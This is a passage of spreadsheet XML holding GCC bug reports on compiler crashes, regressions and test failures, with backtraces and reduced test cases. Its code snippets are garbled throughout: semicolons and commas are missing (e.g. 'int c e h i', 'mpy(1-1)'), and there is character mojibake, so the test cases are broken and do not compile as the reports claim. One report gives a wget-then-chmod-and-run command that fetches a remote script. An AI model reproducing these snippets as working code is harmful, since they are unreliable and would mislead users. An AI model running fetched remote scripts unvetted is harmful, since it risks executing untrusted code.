   SpyExample'
x.cc:6: error: syntax error before `{' token
x.cc:8: error: ISO C++ forbids declaration of `queryAliases' with no type
x.cc:8: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$
Here's where it's dying:
Program received signal SIGSEGV Segmentation fault.
0x0805d27e in push_local_name (decl=0x4005b000) at ../../gcc/gcc/cp/decl.c:2664
2664   if (!local_names)
(gdb) where
#0  0x0805d27e in push_local_name (decl=0x4005b000)
    at ../../gcc/gcc/cp/decl.c:2664
#1  0x0806e2f0 in cp_finish_decl (decl=0x4005b000 init=0x0 
    asmspec_tree=0x22 flags=0) at ../../gcc/gcc/cp/decl.c:8506
#2  0x0806e9b7 in finish_decl (decl=0x0 init=0x0 asmspec_tree=0x0)
    at ../../gcc/gcc/cp/decl.c:8593
#3  0x08075a7a in grokdeclarator (declarator=0x40058480 declspecs=0x0 
    decl_context=NORMAL initialized=0 attrlist=0xbfffb32c)
    at ../../gcc/gcc/cp/decl.c:10120
#4  0x0806b353 in start_decl (declarator=0x0 declspecs=0x4005b000 
    initialized=1074091824 attributes=0x0 prefix_attributes=0x0)
    at ../../gcc/gcc/cp/decl.c:7274
#5  0x080de731 in parse_decl (declarator=0x0 attributes=0x0 initialized=0)
    at parse.y:182
#6  0x080e193b in yyparse () at parse.y:2124
#7  0x081486e9 in c_common_parse_file (set_yydebug=0)
    at ../../gcc/gcc/c-lex.c:159
#8  0x0831222d in compile_file () at ../../gcc/gcc/toplev.c:2132
#9  0x083177d5 in do_compile () at ../../gcc/gcc/toplev.c:5361
#10 0x0831787d in toplev_main (argc=0 argv=0xbfffbf00)
    at ../../gcc/gcc/toplev.c:5391
#11 0x0815147b in main (argc=0 argv=0x0) at ../../gcc/gcc/main.c:35
Release:
3.3 20021203 (experimental)
Environment:
System: Linux karma 2.4.19-emp_2419p5a829i #1 Tue Sep 3 17:42:17 EST 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --prefix=/usr/local/gcc --enable-threads=posix --enable-long-long --enable-languages=cc++f77
How-To-Repeat:
----------------------------
class SpyExample {}
FWK_REGISTRY_IMPL(SpyExample$Name: v00-04-13 $)
SpyExample::~SpyExample() {}
void SpyExample::ready(DataStore&amp; ds)
{
  vector inputs
  queryAliases(ds)
}
----------------------------</t>
  </si>
  <si>
    <t>GCC-20073</t>
  </si>
  <si>
    <t>[4.0 regression] ICE initializing const array</t>
  </si>
  <si>
    <t>The following valid code snippet causes an ICE when compiled with mainline:
==============================
template struct A
{
    A()
}
const A x[] = { A() }
==============================
bug.cc:7: internal compiler error: in set_mem_attributes_minus_bitpos at
emit-rtl.c:1539
Please submit a full bug report [etc.]
This is a relitively new regression (the compiler from 2005-02-16works fine).</t>
  </si>
  <si>
    <t>GCC-5222</t>
  </si>
  <si>
    <t>Re: included file in std_algorithm.h</t>
  </si>
  <si>
    <t xml:space="preserve"> &gt;Hello
 &gt;
 &gt;In bits/std_algorithm.h there's the following line:
 oops it's in bits/std_functional and a number of other
 files but not in bits/std_algorithm (std_cmath.h
 std_complex.h std_cstdio.h std_cstdlib.h cwchar.h
 iomanip iosfwd iostream...).
 Another question for maximum portability should I
 use the keywords and or or_eq etc.?  Is there or
 will there be a policy on this?  Thanks.
 &gt;#include 
 &gt;
 &gt;However the only file in bits which comes close is
 &gt;c++config [nb:  no .h].  I suppose that shows the
 &gt;importance of _that_ header file.
 &gt;
 &gt;BTW I am working on updating the whole libstdc++
 &gt;in both programming style and the use of #includes
 &gt;which someone mentioned should only be in the
 &gt;standard library files.
 &gt;
 &gt;One other question why are the files referred to
 &gt;by  in one (or is it two) separate directories
 &gt;from the other  C++ standard headers?
 &gt;What differentiates c_std from c_shadow?  I think it
 &gt;might be wise as a hint to put the carry-over non-
 &gt;namespace C headers in include/deprecated any thoughts?
 &gt;
 &gt;--Jeff Turner
 &gt;
 &gt;Who put the Sam in the 'Sama Laden Ding-Dong?
 &gt;
 &gt;PS.  Can I get on the official list of maintainers please?
 &gt;
Release:
unknown</t>
  </si>
  <si>
    <t>jturner</t>
  </si>
  <si>
    <t>GCC-40963</t>
  </si>
  <si>
    <t>ICE segfault - c_loc with derived type component as argument</t>
  </si>
  <si>
    <t>(first bug I'm reporting apologies if duplicate or info missing)
== COMPILE-TIME OUTPUT ==
gfortran -I. -Isrc/  -v  -save-temps -Wall -fbounds-check  -O2 -ffree-form -c -o main.o /gusr/alr99/cluster/workspace/helloworld/main.f90
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.3.3/configure --prefix=/nexsan3/sware64/gnu/gcc-4.3.3/linux64 --with-mpfr=/nexsan3/sware64/mpfr/linux64 --enable-languages=all
Thread model: posix
gcc version 4.3.3 (GCC)
COLLECT_GCC_OPTIONS='-I.' '-Isrc/' '-v' '-save-temps' '-Wall' '-fbounds-check' '-O2' '-ffree-form' '-c' '-o' 'main.o' '-mtune=generic'
 /nexsan3/sware64/gnu/gcc-4.3.3/linux64/libexec/gcc/x86_64-unknown-linux-gnu/4.3.3/f951 /gusr/alr99/cluster/workspace/helloworld/main.f90 -quiet -dumpbase main.f90 -mtune=generic -auxbase-strip main.o -O2 -Wall -version -fbounds-check -ffree-form -I. -Isrc/ -fintrinsic-modules-path /nexsan3/sware64/gnu/gcc-4.3.3/linux64/lib/gcc/x86_64-unknown-linux-gnu/4.3.3/finclude -o main.s
GNU F95 (GCC) version 4.3.3 (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.3.3 GMP version 4.1.4 MPFR version 2.4.1-p5.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
/gusr/alr99/cluster/workspace/helloworld/main.f90: In function â€˜testclocâ€™:
/gusr/alr99/cluster/workspace/helloworld/main.f90:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [main.o] Error 1</t>
  </si>
  <si>
    <t>rohou</t>
  </si>
  <si>
    <t>GCC-70169</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE at -O1 and above on x86_64-linux-gnu in gen_lsm_tmp_name at tree-ssa-loop.c:791</t>
  </si>
  <si>
    <t>The following (invalid) code causes an ICE when compiled with the current gcc trunk on x86_64-linux-gnu at -O1 and above in both 32-bit and 64-bit modes.
It also affects at least 4.6.x and after: 
- 4.6.x and 4.7.x hang 
- 4.8.x and later ICE
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 6.0.0 20160310 (experimental) [trunk revision 234104] (GCC) 
$ 
$ gcc-trunk -O0 -c small.c
$  
$ gcc-trunk -O1 -c small.c
small.c: In function â€˜fn1â€™:
small.c:4:1: internal compiler error: in gen_lsm_tmp_name at tree-ssa-loop.c:791
 fn1 ()
 ^~~
0xcdb56b gen_lsm_tmp_name
        ../../gcc-source-trunk/gcc/tree-ssa-loop.c:791
0xcdb610 gen_lsm_tmp_name
        ../../gcc-source-trunk/gcc/tree-ssa-loop.c:731
0xcdc275 get_lsm_tmp_name(tree_node* unsigned int char const*)
        ../../gcc-source-trunk/gcc/tree-ssa-loop.c:805
0xca5d7c execute_sm
        ../../gcc-source-trunk/gcc/tree-ssa-loop-im.c:1957
0xca5d7c hoist_memory_references
        ../../gcc-source-trunk/gcc/tree-ssa-loop-im.c:2021
0xca5d7c store_motion_loop
        ../../gcc-source-trunk/gcc/tree-ssa-loop-im.c:2295
0xca795a store_motion
        ../../gcc-source-trunk/gcc/tree-ssa-loop-im.c:2316
0xca795a tree_ssa_lim
        ../../gcc-source-trunk/gcc/tree-ssa-loop-im.c:2530
0xca795a execute
        ../../gcc-source-trunk/gcc/tree-ssa-loop-im.c:2580
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
-----------------------------------
int printf (const char * ...) 
void
fn1 ()
{
  int *p = (int *)  
  for ()
    (*p)++
}</t>
  </si>
  <si>
    <t>GCC-23620</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] Segfault compiling inner interfaces</t>
  </si>
  <si>
    <t>I'm getting an ICE with gcc 4.0.1 that I've reduced to the following test case
with three classes in A.java B.java and C.java respectively:
public class A  {
    public interface AInt { void methA() }
}
public class B implements A.AInt {
    void methA() { }
    public interface BInt { void methB() }
}
public class C implements B.BInt {
    void methB() { }
}
$ gcj -C A.java
$ gcj -C B.java
$ gcj -C C.java
C.java:0: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
For Debian GNU/Linux specific bug reporting instructions
see .
However doing
$ gcj -C A.java B.java C.java
gives no error.
Sorry if this is already known but I couldn't find a similar bug already reported.
$ gcc-4.0 -v
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v
--enable-languages=cc++javaf95objcadatreelang --prefix=/usr
--enable-shared --with-system-zlib --libexecdir=/usr/lib --enable-nls
--without-included-gettext --enable-threads=posix --program-suffix=-4.0
--enable-__cxa_atexit --enable-libstdcxx-allocator=mt --enable-clocale=gnu
--enable-libstdcxx-debug --enable-java-gc=boehm --enable-java-awt=gtk
--with-java-home=/usr/lib/jvm/java-1.4.2-gcj-4.0-1.4.2.0/jre --enable-mpfr
--disable-werror --enable-checking=release i486-linux-gnu
Thread model: posix
gcc version 4.0.1 (Debian 4.0.1-2)</t>
  </si>
  <si>
    <t>wmahan</t>
  </si>
  <si>
    <t>GCC-46974</t>
  </si>
  <si>
    <t>ICE with TRANSFER using a C_PTR entity</t>
  </si>
  <si>
    <t>program bug1
   use ISO_C_BINDING
   implicit none
   type(c_ptr) :: m
   type mytype
     integer a b c
   end type mytype
   type(mytype) x
   print * transfer(32512 x)  ! Works.
   print * transfer(32512 m)  ! Cause ICE.
end program bug1 
laptop:kargl[206] gfc4x -c po.f90
f951: internal compiler error: Segmentation fault: 11
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
laptop:kargl[207] gdb /usr/home/kargl/work/libexec/gcc/i386-unknown-freebsd9.0/4.6.0/f951
GNU gdb 6.8
Copyright (C) 2008 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as i386-unknown-freebsd8.0...
(gdb) run po.f90
Starting program: /usr/home/kargl/work/libexec/gcc/i386-unknown-freebsd9.0/4.6.0/f951 po.f90
Program received signal SIGSEGV Segmentation fault.
0x0814d56d in gfc_interpret_derived (buffer=0xbfbfe0e0  buffer_size=4 
    result=0x495759e0) at ../../gcc4x/gcc/fortran/target-memory.c:486
486           ptr = TREE_INT_CST_LOW (DECL_FIELD_BIT_OFFSET (cmp-&gt;backend_decl))
(gdb) print cmp-&gt;backend_decl
$1 = (tree) 0x0
(gdb) print *cmp
$3 = {name = 0x49830a64 __c_ptr_c_address ts = {type = BT_INTEGER 
    kind = 4 u = {derived = 0x0 cl = 0x0 pad = 0} interface = 0x0 
    is_c_interop = 1 is_iso_c = 0 f90_type = BT_INTEGER deferred = 0 '\0'} 
  attr = {allocatable = 0 dimension = 0 codimension = 0 external = 0 
    intrinsic = 0 optional = 0 pointer = 0 target = 0 value = 0 
    volatile_ = 0 temporary = 0 dummy = 0 result = 0 assign = 0 
    threadprivate = 0 not_always_present = 0 implied_index = 0 
    subref_array_pointer = 0 proc_pointer = 0 asynchronous = 0 
    contiguous = 0 class_pointer = 0 save = SAVE_NONE data = 0 
    is_protected = 0 use_assoc = 0 use_only = 0 use_rename = 0 
    imported = 0 host_assoc = 0 in_namelist = 0 in_common = 0 
    in_equivalence = 0 function = 0 subroutine = 0 procedure = 0 
    generic = 0 generic_copy = 0 implicit_type = 0 untyped = 0 
    is_bind_c = 0 extension = 0 is_class = 0 class_ok = 0 vtab = 0 
    vtype = 0 is_c_interop = 0 is_iso_c = 0 sequence = 0 elemental = 0 
    pure = 0 recursive = 0 unmaskable = 0 masked = 0 contained = 0 
    mod_proc = 0 abstract = 0 noreturn = 0 entry = 0 entry_master = 0 
    mixed_entry_master = 0 always_explicit = 0 referenced = 0 
    is_main_program = 0 access = ACCESS_UNKNOWN intent = INTENT_UNKNOWN 
    flavor = FL_UNKNOWN if_source = IFSRC_UNKNOWN proc = PROC_UNKNOWN 
    cray_pointer = 0 cray_pointee = 0 alloc_comp = 0 pointer_comp = 0 
    proc_pointer_comp = 0 private_comp = 0 zero_comp = 0 coarray_comp = 0 
    select_type_temporary = 0 ext_attr = 0 volatile_ns = 0x0 
    asynchronous_ns = 0x0} as = 0x0 backend_decl = 0x0 loc = {
    nextc = 0x495740e4 lb = 0x49574080} initializer = 0x0 next = 0x0 
  formal = 0x0 formal_ns = 0x0 tb = 0x0}</t>
  </si>
  <si>
    <t>GCC-37338</t>
  </si>
  <si>
    <t>[4.4 Regression] gcc.dg/array-init-1.c</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 139863 gave
FAIL: gcc.dg/array-init-1.c scan-assembler-not abcdefghi
FAIL: gcc.dg/array-init-1.c scan-assembler-times 7017280452245743464|7523094288207667809|6867666564636261|1684234849|64636261 2
revision 139848 is OK.</t>
  </si>
  <si>
    <t>GCC-17073</t>
  </si>
  <si>
    <t>ICE with regmove</t>
  </si>
  <si>
    <t>This problem seems to be specific to ppc.  I was unable
to reproduce it on ia32.
% cat foo.f90 
SUBROUTINE SYSHTN 
PARAMETER (N=100) ! works if N=10
REAL*8 DIMENSION(NN) ::  POP POJ4
REAL*8 Y(N)
POJ4( M 1:N) =  MATMUL( POP  Y )
END
% ~/gcc-3.5/bin/gfortran -v
Reading specs from
/Users/lei/gcc-3.5/bin/../lib/gcc/powerpc-apple-darwin7.3.0/3.5.0/specs
Configured with: ../gcc/configure --prefix=/Users/lei/gcc-3.5/build/..
--enable-languages=f95
Thread model: posix
gcc version 3.5.0 20040816 (experimental)
% ~/gcc-3.5/bin/gfortran -O2 -fno-regmove -c foo.f90 
% ~/gcc-3.5/bin/gfortran -O2 -c foo.f90
foo.f90: In function `syshtn':
foo.f90:4: error: unrecognizable insn:
(insn:HI 23 22 24 0 (set (reg/f:SI 127)
        (plus:SI (reg/f:SI 128)
            (const_int 4294967288 [0xfffffff8]))) -1 (insn_list 22 (nil))
    (expr_list:REG_DEAD (reg/f:SI 128)
        (expr_list:REG_EQUAL (const:SI (plus:SI (symbol_ref:SI (poj4.398)
[flags 0x182] )
                    (const_int 4294967288 [0xfffffff8])))
            (nil))))
foo.f90:4: internal compiler error: in extract_insn at recog.c:2037
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
%</t>
  </si>
  <si>
    <t>GCC-17317</t>
  </si>
  <si>
    <t>[3.3 Regression] Match Constraints for *movdf_insn fails</t>
  </si>
  <si>
    <t>gcc 3.4.2 pre release 20040902 
ramana@arnor:/mnt/tools/fsf/fsfbuild/build-ARC/build-newlib$ arc-elf32-gcc -v
Reading specs from /usr/local/arcfsf/lib/gcc/arc-elf32/3.4.2/specs
Configured with: /mnt/tools/fsf/fsfgcc/gcc-3.4.2-rc-20040902/configure
--prefix=/usr/local/arcfsf --target=arc-elf32 --with-gnu-as --with-gnu-ld
--without-libs --with-newlib --with-stabs --with-dwarf --host=i686-pc-linux-gnu
--enable-languages=c --disable-shared --disable-nls --without-libbanshee
Thread model: single
gcc version 3.4.2 20040902 (prerelease)
 arc-elf32-gcc
-B/mnt/tools/fsf/fsfbuild/build-ARC/build-newlib/arc-elf32/newlib/ -isystem
/mnt/tools/fsf/fsfbuild/build-ARC/build-newlib/arc-elf32/newlib/targ-include
-isystem /mnt/tools/fsf/fsfgcc/newlib-1.12.0/newlib/libc/include
-DPACKAGE=\newlib\ -DVERSION=\1.12.0\  -I.
-I/mnt/tools/fsf/fsfgcc/newlib-1.12.0/newlib/libm/common  -O2 -fno-builtin   
-O2 -g -O2  -O2 -g -O2 -c
/mnt/tools/fsf/fsfgcc/newlib-1.12.0/newlib/libm/common/s_modf.c
/mnt/tools/fsf/fsfgcc/newlib-1.12.0/newlib/libm/common/s_modf.c: In function `modf':
/mnt/tools/fsf/fsfgcc/newlib-1.12.0/newlib/libm/common/s_modf.c:129: error: insn
does not satisfy its constraints:
(insn 108 106 304 3
/mnt/tools/fsf/fsfgcc/newlib-1.12.0/newlib/libm/common/s_modf.c:106 (set (mem:DF
(reg:SI 31 blink [6]) [2 S8 A64])
        (reg:DF 4 r4 [orig:92 iw_u ] [92])) 8 {*movdf_insn} (insn_list 105
(insn_list 106 (nil)))
    (nil))
/mnt/tools/fsf/fsfgcc/newlib-1.12.0/newlib/libm/common/s_modf.c:129: internal
compiler error: in extract_constrain_insn_cached at recog.c:2000</t>
  </si>
  <si>
    <t>GCC-6355</t>
  </si>
  <si>
    <t>g++ 2.95.4 allows creation of pure virtual object by autoconversion</t>
  </si>
  <si>
    <t>This code should be rejected the bug can be pretty hard to find in complex code:
class Base {
public:
  Base(bool) {}
  virtual Base* clone() const = 0
}
class Composition {
  Base* basePointer_
public:
  Composition(const Base&amp; basePointer) : basePointer_(basePointer.clone()) {}
}
int main() {
  Composition c(false)
}
Release:
2.95.4
Environment:
debian woody up to date as of 18.4.02
custom linux kernel 2.4.18 built with gcc 2.95.4
How-To-Repeat:
Compile the above code without any compiler options execute a.out if you care.</t>
  </si>
  <si>
    <t>schrotie</t>
  </si>
  <si>
    <t>GCC-82290</t>
  </si>
  <si>
    <t>[8 Regression] ICE at -O2 on x86_64-linux-gnu: verify_flow_info failed</t>
  </si>
  <si>
    <t>$ gcctk -v
Using built-in specs.
COLLECT_GCC=gcctk
COLLECT_LTO_WRAPPER=/home/su/software/tmp/gcc/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/8.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/home/su/software/tmp/gcc/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 8.0.0 20170921 (experimental) [trunk revision 253084] (GCC)
$
$ gcctk -Os -c small.c
$
$ gcctk -O2 -c small.c
small.c: In function â€˜fn1â€™:
small.c:35:1: error: non-cold basic block 6 reachable only by paths crossing the cold partition
 }
 ^
during RTL pass: bbro
small.c:35:1: internal compiler error: verify_flow_info failed
0x7f12ce verify_flow_info()
        ../../gcc-source-trunk/gcc/cfghooks.c:259
0x8080d4 checking_verify_flow_info
        ../../gcc-source-trunk/gcc/cfghooks.h:198
0x8080d4 cfg_layout_finalize()
        ../../gcc-source-trunk/gcc/cfgrtl.c:4314
0x13552f9 execute
        ../../gcc-source-trunk/gcc/bb-reorder.c:2601
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
-----------------------------------------
int printf (const char * ...)
struct
{ 
  int a:2
} b
int c e h i
unsigned j
long d g
volatile int f
void fn1 ()
{ 
  while (1)
    while (1)
      { 
        if (h)
          break
        int l
        if (i)
          {
          L:
            j = b.a
            g = (g ^ (f 
            e = (g 
            if (!l)
              { 
                printf (%ld\n g)
                goto L
              }
          }
        b.a = j
      }
}</t>
  </si>
  <si>
    <t>GCC-79379</t>
  </si>
  <si>
    <t>[7 Regression] ICE with #pragma GCC ivdep</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE on trunk:
======================================
template void foo(int* p)
{
#pragma GCC ivdep
  for (int i = 0 p[i] ++i) 
}
void bar(int* p)
{
  foo(p)
}
======================================
bug.cc: In instantiation of 'void foo(int*) [with int  = 0]':
bug.cc:9:11:   required from here
bug.cc:4:17: sorry unimplemented: unexpected AST of kind annotate_expr
   for (int i = 0 p[i] ++i) 
                 ^
bug.cc:4:17: internal compiler error: in potential_constant_expression_1 at cp/constexpr.c:5697
0x83f32a potential_constant_expression_1
        ../../gcc/gcc/cp/constexpr.c:5697
0x83fcd9 potential_constant_expression(tree_node*)
        ../../gcc/gcc/cp/constexpr.c:5708
0x83fcd9 potential_nondependent_constant_expression(tree_node*)
        ../../gcc/gcc/cp/constexpr.c:5750
0x840d64 maybe_constant_value(tree_node* tree_node*)
        ../../gcc/gcc/cp/constexpr.c:4787
0x81be2a cp_fully_fold(tree_node*)
        ../../gcc/gcc/cp/cp-gimplify.c:1963
0x75c644 cp_build_binary_op(unsigned int tree_code tree_node* tree_node* int)
        ../../gcc/gcc/cp/typeck.c:5237
0x76de98 ocp_convert(tree_node* tree_node* int int int)
        ../../gcc/gcc/cp/cvt.c:801
0x76fbcb cp_convert(tree_node* tree_node* int)
        ../../gcc/gcc/cp/cvt.c:616
0x76fbcb cp_convert_and_check(tree_node* tree_node* int)
        ../../gcc/gcc/cp/cvt.c:635
0x5f7445 convert_like_real
        ../../gcc/gcc/cp/call.c:7042
0x5f835c perform_implicit_conversion_flags(tree_node* tree_node* int int)
        ../../gcc/gcc/cp/call.c:10071
0x74dc04 condition_conversion(tree_node*)
        ../../gcc/gcc/cp/typeck.c:5547
0x7ac4e7 maybe_convert_cond
        ../../gcc/gcc/cp/semantics.c:989
0x7ac4e7 finish_for_cond(tree_node* tree_node* bool)
        ../../gcc/gcc/cp/semantics.c:980
0x66ecdb tsubst_expr(tree_node* tree_node* int tree_node* bool)
        ../../gcc/gcc/cp/pt.c:15790
0x66f2b0 tsubst_expr(tree_node* tree_node* int tree_node* bool)
        ../../gcc/gcc/cp/pt.c:15880
0x66ba67 instantiate_decl(tree_node* bool bool)
        ../../gcc/gcc/cp/pt.c:22817
0x6abadb instantiate_pending_templates(int)
        ../../gcc/gcc/cp/pt.c:22938
0x6ee668 c_parse_final_cleanups()
        ../../gcc/gcc/cp/decl2.c:4525
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-10486</t>
  </si>
  <si>
    <t>Regression (ICE) in 3.3 branch due to recent patch.</t>
  </si>
  <si>
    <t xml:space="preserve">From: Wolfgang Bangerth 
To: Carlo Wood 
Cc: gcc-bugs@gcc.gnu.org 
Subject: Re: c++/10486: Regression (ICE) in 3.3 branch due to recent patch.
Date: Thu 24 Apr 2003 19:55:45 -0500 (CDT)
 &gt; That test case indeed fails with my current 3.3.
 &gt; I'll update again and retry.  Too bad I wasted a whole evening
 &gt; condensing that test case while it was already fixed :/.
 What can I say -- I reduced and filed 10471 only to find out shortly 
 after that almost exactly the same bug had already been filed a couple of 
 hours earlier. The bug only existed about a day and we now have 3 reports 
 about it...
 Can you ping me when you find that it is indeed fixed for your code? I'll 
 close the report then if you want.
 W.
 -------------------------------------------------------------------------
 Wolfgang Bangerth              email:            bangerth@ices.utexas.edu
                                www: http://www.ices.utexas.edu/~bangerth/
</t>
  </si>
  <si>
    <t>GCC-35015</t>
  </si>
  <si>
    <t>missing cleanup-modules directive in testsuite/gfortran*</t>
  </si>
  <si>
    <t>$ wget -P gcc/contrib/ \
http://uclibc.org/~aldot/gcc/gfortran.dg-final.cleanup-mods.awk
$ chmod +x gcc/contrib/gfortran.dg-final.cleanup-mods.awk
$ cd gcc/testsuite
$ $ for i in $(grep --exclude='*.svn*' -rl dg-do gfortran*) do ../contrib/gfortran.dg-final.cleanup-mods.awk $idone 2&gt; /dev/null
This scripts emits on stdout a diagnostic message about
a) wrong encoding in testcases (CRLF)
b) missing cleanup-module directives
On stderr this scripts emits sed scripts to automagically
a) fix the wrong encoding
b) add missing cleanup-module directives.
I put it into public domain but this can be changes if required.
IMHO it would be handy to have this script in gcc/contrib</t>
  </si>
  <si>
    <t>aldot</t>
  </si>
  <si>
    <t>GCC-49745</t>
  </si>
  <si>
    <t>error: â€˜int truncateâ€™ redeclared as different kind of symbol</t>
  </si>
  <si>
    <t>Hi
  g++ pollutes the global namespace. The following does not compile with G++ 4.4.5:
#include 
int truncate = 0
int main()
{
  return 0
}
If fails with:
t.cxx:2: error: â€˜int truncateâ€™ redeclared as different kind of symbol
/usr/include/unistd.h:998: error: previous declaration of â€˜int truncate(const char* __off_t)â€™
Thanks !</t>
  </si>
  <si>
    <t>mathieu.malaterre</t>
  </si>
  <si>
    <t>GCC-60590</t>
  </si>
  <si>
    <t>Can't recreate the same executable in testsuite</t>
  </si>
  <si>
    <t>On Linux one can't run the command found in testsuite/gcc/gcc.log
to recreate the same executable since lib/target-libpath.exp sets
LD_RUN_PATH which makes ld to set DT_RPATH.  But LD_RUN_PATH is
recorded in testsuite/gcc/gcc.log.  We may not set LD_RUN_PATH
when run the command to recreate the same executable.  As the result
the executable generated by hand doesn't have DT_RPATH.</t>
  </si>
  <si>
    <t>GCC-26032</t>
  </si>
  <si>
    <t>[gomp-branch] ICE in copy_body_r</t>
  </si>
  <si>
    <t>This is a follow-up to PR/25874 with the identical test case.
The compilation now causes another ICE:
/scratch&gt;g++ -v -O -fopenmp -c bug.ii
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: /scratch/gompcc/configure --quiet --prefix=/scratch/ugccgomp --enable-languages=c++fortran --with-gmp=/usr/local/appl/gmp-4.1.4 --enable-checking=release
Thread model: posix
gcc version 4.2.0-gomp-20050608-branch 20060126 (experimental) (merged 20060126)
 /scratch/ugccgomp/libexec/gcc/i686-pc-linux-gnu/4.2.0-gomp-20050608-branch/cc1plus -fpreprocessed bug.ii -quiet -dumpbase bug.ii -mtune=generic -auxbase bug -O -version -fopenmp -o /tmp/cchqvFNL.s
GNU C++ version 4.2.0-gomp-20050608-branch 20060126 (experimental) (merged 20060126) (i686-pc-linux-gnu)
        compiled by GNU C version 4.2.0-gomp-20050608-branch 20060126 (experimental) (merged 20060126).
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: ddc6509291ab6cf0d07599318fa2caeb
Healpix_cxx/alm_powspec_tools.cc: In function 'void rotate_alm(Alm &gt;&amp; Alm &gt;&amp; Alm &gt;&amp; double double double) [with T = double]':
Healpix_cxx/alm_powspec_tools.cc:476: internal compiler error: in copy_body_r at tree-inline.c:630
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Unfortunately I probably won't be able to reduce the test case until the weekend at least.</t>
  </si>
  <si>
    <t>GCC-11560</t>
  </si>
  <si>
    <t>[3.4 regression] -fprofile-arcs no longer creates {.da.gcda} files</t>
  </si>
  <si>
    <t>As shown in testsuite runs
-fprofile-arcs no longer creates the *.da (though based on the testsuite I'm
assuming that these were recently renamed to *.gcra) which are used for
-fbranch-probabilities.
This feature works fine under cygwin in 3.3.
In addition a profiledbootstrap now fails for the exact same reason this was
working until recently.</t>
  </si>
  <si>
    <t>kelleycook</t>
  </si>
  <si>
    <t>GCC-9348</t>
  </si>
  <si>
    <t>[HP-UX] error in int to unsigned long multiplication</t>
  </si>
  <si>
    <t>multiplication of int/long values converted to unsigned long long generates wrong results.
compile the following code with gcc...
ll.c
&lt;&lt;
#include 
#define u_l_l unsigned long long
#define l_l long long
l_l mpy_res
u_l_l mpy (long a long b)
{
   return  (u_l_l) a * (u_l_l) b
}
&lt;&lt;EOF
int main(void)
{
   mpy_res = mpy(1-1)
   printf(dec %lld\n hex %llx\n want %llx\n (l_l) mpy_res (l_l) mpy_res -1LL)
}
$&gt;gcc ll.c
$&gt;a.out
dec 8589934591
hex 1ffffffff
want ffffffffffffffff
Release:
3.2.1</t>
  </si>
  <si>
    <t>balpreet.singh</t>
  </si>
  <si>
    <t>GCC-27547</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 regression] ICE on invalid operator=</t>
  </si>
  <si>
    <t>Since GCC 3.4.0 the C++ frontend ICEs on the following invalid code snippet:
========================
int operator=(int)
void foo()
{
  operator=(0)
}
========================
bug.cc:1: error: 'int operator=(int)' must be a nonstatic member function
bug.cc: In function 'void foo()':
bug.cc:5: internal compiler error: in copy_fn_p at cp/decl.c:8821
Please submit a full bug report [etc.]
I'll post a patch soon.</t>
  </si>
  <si>
    <t>GCC-47401</t>
  </si>
  <si>
    <t>Support for must-not-throw regions with SJLJ exceptions broken</t>
  </si>
  <si>
    <t>A couple of exception related tests are failing on SPU:
FAIL: g++.dg/cpp0x/noexcept04.C execution test
FAIL: g++.dg/cpp0x/noexcept05.C scan-assembler LSDA
FAIL: g++.dg/eh/spec10.C execution test
FAIL: g++.dg/eh/spec11.C scan-assembler LSDA
These are related to must-not-throw regions.  To implement those
we may have to register a personality function with empty LSDA.
This has been implemented for DWARF CFI exception handling but
apparently not (fully?) for SJLJ exception handling.
For example the test case for noexcept05.C:
struct A { ~A() }
void g()
void f() noexcept
{
  A var
  g()
}
compiles on the SPU to:
        .global _Z1fv
        .type   _Z1fv @function
_Z1fv:
        stqd    $lr16($sp)
        stqd    $sp-48($sp)
        ai      $sp$sp-48
        brsl    $lr_Z1gv
        ai      $2$sp32
        ori     $3$20
        brsl    $lr_ZN1AD1Ev
        ai      $sp$sp48
        lqd     $lr16($sp)
        bi      $lr
        .size   _Z1fv .-_Z1fv
Note the absence of any call to _Unwind_SJLJ_Register.</t>
  </si>
  <si>
    <t>GCC-60823</t>
  </si>
  <si>
    <t>[4.9/4.10 Regression] ICE in gimple_expand_cfg at cfgexpand.c:5644</t>
  </si>
  <si>
    <t>We noticed that adding 'const' qualifier to function arguments marked with simd declare pragma leads to issue ICE on attached test-case. Test is compiled successfully if 'const' was deleted. To reproduce failure the following command line options are needed: -O1  -m64  test.cpp -c -fopenmp.</t>
  </si>
  <si>
    <t>GCC-14865</t>
  </si>
  <si>
    <t>[3.3 Regression] No instantiation of VTT at -O1</t>
  </si>
  <si>
